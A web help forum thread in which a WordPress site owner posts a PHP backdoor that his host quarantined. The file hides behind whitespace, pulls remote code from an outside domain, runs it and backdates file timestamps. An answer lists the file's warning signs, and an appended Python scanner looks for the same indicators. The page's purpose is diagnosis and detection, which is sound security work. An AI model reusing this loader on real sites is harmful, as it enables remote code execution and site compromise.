Hosting sending virus errors, couldn't get rid of this

2

I have a WordPress website and HostGator keeps sending this information →

During a scan of our servers we identified malicious content in accounts under your control. We have quarantined the files listed below to prevent abuse. Please note that no services have been disabled and no legitimate content has been affected by this action. However, it is possible that other malicious activity may have disrupted your services.

The most important things you can do to ensure the security of your account are to make sure your software (e.g WordPress) is up-to-date, and that your passwords are strong. We strongly encourage you to change all of your account passwords and update all software as soon as possible to prevent any further compromises or abuse.

We understand that any risk to our network reputation is a risk to our customers' reputation and so we take third-party reports of network abuse seriously. In order to protect our shared reputation we may disable account services in the event of a third-party report of network abuse until we are confident that the account has been properly cleaned and secured.

This email is to inform you of content found by our proactive scans, and is not the result of a third-party abuse report. No services have been disabled as a result of this discovery. Additional information on HostGator's policies, and what activity is damaging to a network's reputation in general, is available in our knowledge base: Acceptable Use Policy

My Account was Hacked

If you would like help in securing your account we recommend SiteLock, a security service and partner of ours. They can be contacted at 844-631-8637.

HostGator Security Department

Quarantined files:
/home2/xxxxx/public_html/xm1rpc.php


I have attached the file:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: ''; 
if (false !== strpos($query, 'simpler-ws')) { 
  __1get_ws(); 
  $ws_hash = md5('wsa'); 
  $cache_dir = __1get_root(); 
  $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; 
  require($ws_file); die(''); 
} 

function __1get_root() { 
  $localpath=getenv("SCRIPT_NAME");
  $absolutepath=getenv("SCRIPT_FILENAME");
  $root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
  return $root_path; 
} 

function __1get_ws() { 
  $host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: ''; 
  $ws_hash = md5('wsa'); 
  $cache_dir = __1get_root(); 
  $ws_file = $cache_dir.'/'.$ws_hash.'.zip'; 
  if (file_exists($ws_file)) { 
    chmod($ws_file, 0644); 
  } 
  if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*1)) { 
  $ws = __1fetch_url(__get_rev().'&get_ws'); 
  if (!empty($ws)) 
    file_put_contents($ws_file, $ws); 
    chmod($ws_file, 0644); 
    touch($ws_file, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
    touch(dirname($ws_file) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
  } else { 
    $ws = file_get_contents($ws_file); 
  } 
  return $ws; 
} 

function __get_rev() { 
  return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); 
  return 'http://nezlobudnya.com/generate'; 
} 

function __1fetch_url($url) { 
  $contents = false; 
  $errs = 0; 
  while ( !$contents && ($errs++ < 3) ) { 
    $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'; 
      if (is_callable('curl_init')) { 
        $c = curl_init($url); 
        curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE); 
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($c, CURLOPT_USERAGENT,$user_agent); 
        $contents = curl_exec($c); 
          if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) 
              $contents = false; 
              curl_close($c); 
          } else { 
              $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen')); 
                 if ($allowUrlFopen) { 
                    $options = array('http' => array('user_agent' => $user_agent)); $context = stream_context_create($options); $contents = @file_get_contents($url, false, $context); 
                 } 
          } 
      } 
   return $contents; 
}
// Silence is golden

I ran a Sucuri scan, but no virus was found. What is the problem?

    
asked by The WP Novice 08.02.2017 - 04:17
source

1 answer

1

Suspicious points about that file:

  • a lot of wasted space before the code.

  • starting it off like a legitimate WordPress file but putting in code not typically found in that file.

  • slightly altering the file name by replacing l with 1.

  • changing permissions on other files programmatically.

  • redirecting the page to a couple of other sites.

  • not sanitizing input strings.

You should probably check your server and code quite thoroughly, then clean the server and reinstall your WordPress site.

    
answered 08.02.2017 - 05:01
source
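A defender-side sweep of a site root for the indicators visible in the posted file and listed in the answer, as an added example that is not part of the original question or answer. The core file list, the 200-character padding threshold, the reason labels and the sample files built in `demo()` are assumptions made for illustration.

```python
import os
import re
import tempfile

CORE_NAMES = {"xmlrpc.php", "wp-login.php", "wp-config.php", "index.php"}  # assumed subset
LOOKALIKE = str.maketrans({"1": "l", "0": "o"})  # digit-for-letter swaps
PADDING = re.compile(rb"<\?php[ \t]{200,}\S")     # code pushed off-screen (threshold assumed)
HASH_ZIP = re.compile(r"^[0-9a-f]{32}\.zip$")     # md5-style cache name, as in the sample
BACKDATE_SECS = 30 * 24 * 3600                    # smallest offset the sample's touch() uses


def scan(root):
    """Return sorted (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            st = os.stat(path)
            with open(path, "rb") as fh:
                head = fh.read(8192)
            lower = name.lower()
            if lower not in CORE_NAMES and lower.translate(LOOKALIKE) in CORE_NAMES:
                findings.append((rel, "lookalike-name"))
            if lower.endswith(".php") and PADDING.search(head):
                findings.append((rel, "padded-php"))
            if HASH_ZIP.match(lower):
                if not head.startswith(b"PK"):  # real zip archives start with "PK"
                    findings.append((rel, "zip-not-archive"))
                # touch() can backdate mtime but not ctime (inode change time on Linux).
                if st.st_ctime - st.st_mtime >= BACKDATE_SECS:
                    findings.append((rel, "backdated-mtime"))
    return sorted(findings)


def demo():  # builds a constructed docroot in a temp dir and scans it
    zip_name = "0123456789abcdef0123456789abcdef.zip"  # constructed name
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "xmlrpc.php": b"<?php\n// stand-in for the genuine core file\n",
            "xm1rpc.php": b"<?php" + b" " * 900 + b"$query = '';\n",
            zip_name: b"<?php /* constructed payload stand-in */",
        }
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        old = os.stat(root).st_mtime - 90 * 24 * 3600
        os.utime(os.path.join(root, zip_name), (old, old))
        return scan(root)
```

Point `scan()` at the account's `public_html`; each hit is a lead for manual review rather than a verdict.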
